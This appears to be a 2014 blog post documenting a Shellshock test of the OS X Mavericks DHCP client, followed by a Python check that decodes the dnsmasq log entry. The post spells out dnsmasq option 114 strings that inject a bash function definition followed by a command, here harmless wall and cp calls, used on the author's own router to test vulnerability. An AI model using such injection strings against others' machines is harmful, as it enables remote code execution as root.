Documenting DHCP Bash vuln test on OSX Mavericks

September 27, 2014

I tested DHCP Client on Mac OSX Mavericks to see if it is vulnerable to the Bash hole. If my test is correct, it is not. Here is my test:

First, come up with a root command that will be noticeable, and verify that it is noticeable. /usr/bin/wall is one such command, and I tested it here:

dr2chase:VM dr2chase$ sudo /usr/bin/wall /etc/syslog.conf
Password:
                                                                               
Broadcast Message from dr2chase@dr2chase.local                                 
        (/dev/ttys001) at 22:03 EDT...                                         
                                                                               
# Note that flat file logs are now configured in /etc/asl.conf                 
                                                                               
install.*						@127.0.0.1:32376                                                
                                                                               

Next, open a window to my router running Tomato and feed options to Dnsmasq, save, wait for the services to restart, then turn wifi off and on.

DnsMasqSettings

For copy-paste purposes, that string is

dhcp-option-force=114,() {ignored;}; /usr/bin/wall /etc/syslog.conf

I also tried this string to see if the bash script was running with lower privileges, yet still vulnerable:

dhcp-option-force=114,() {ignored;}; /bin/cp /etc/syslog.conf /tmp

I used these examples to get the option-setting right to Tomato, and this example to get the right option string for dnsmasq.

I verified this by setting log-dhcp and checking the logs on the router, and saw this:

Sep 27 22:25:33 janus daemon.info dnsmasq-dhcp[4580]: 1981429455 sent size: 45 option:114   28:29:20:7b:69:67:6e:6f:72:65:64:3b:7d:3b...

It should be intuitively obvious to the ASCII observer that the string was sent, spaces and all.
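
The same check done mechanically, as an added example that is not part of the original post: it decodes the hex prefix from the dnsmasq log line above, compares it and the logged size against the configured option string, and flags values that begin with the `() {` function-definition prefix. The function names are hypothetical and the regular expression assumes the log format of the single line shown here.

```python
import re

# The dnsmasq log-dhcp line quoted in the post (dnsmasq truncates the value with "...").
LOG_LINE = ("Sep 27 22:25:33 janus daemon.info dnsmasq-dhcp[4580]: 1981429455 "
            "sent size: 45 option:114   28:29:20:7b:69:67:6e:6f:72:65:64:3b:7d:3b...")
# The option 114 value configured in the post.
CONFIGURED = "() {ignored;}; /usr/bin/wall /etc/syslog.conf"

# Assumed layout: "sent size: N option:CODE  hh:hh:hh[...]", taken from the line above.
SENT_RE = re.compile(
    r"sent size:\s*(?P<size>\d+)\s+option:\s*(?P<opt>\d+)\s+"
    r"(?P<hex>[0-9a-f]{2}(?::[0-9a-f]{2})*)(?P<trunc>\.\.\.)?", re.I)

def parse_sent_option(line):
    """Return size, option code, decoded value prefix and truncation flag, or None."""
    m = SENT_RE.search(line)
    if not m:
        return None
    return {
        "size": int(m["size"]),
        "option": int(m["opt"]),
        "prefix": bytes.fromhex(m["hex"].replace(":", "")),
        "truncated": m["trunc"] is not None,
    }

def matches_configured(rec, configured):
    """True if the logged size and visible bytes agree with the configured string."""
    want = configured.encode("ascii")
    if rec["size"] != len(want):
        return False
    if rec["truncated"]:
        # Only the leading bytes are logged, so compare the prefix.
        return want.startswith(rec["prefix"])
    return want == rec["prefix"]

def looks_like_function_definition(rec):
    """Flag option values starting with the "() {" prefix used in this test."""
    return rec["prefix"].startswith(b"() {")

if __name__ == "__main__":
    rec = parse_sent_option(LOG_LINE)
    print(rec["option"], rec["size"], rec["prefix"].decode("ascii"))
    print("matches configured string:", matches_configured(rec, CONFIGURED))
    print("function-definition prefix:", looks_like_function_definition(rec))
```

Because the log shows only the first bytes, the size field is what distinguishes the two strings tried above: the `wall` variant is 45 bytes long and the `cp` variant is 44.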
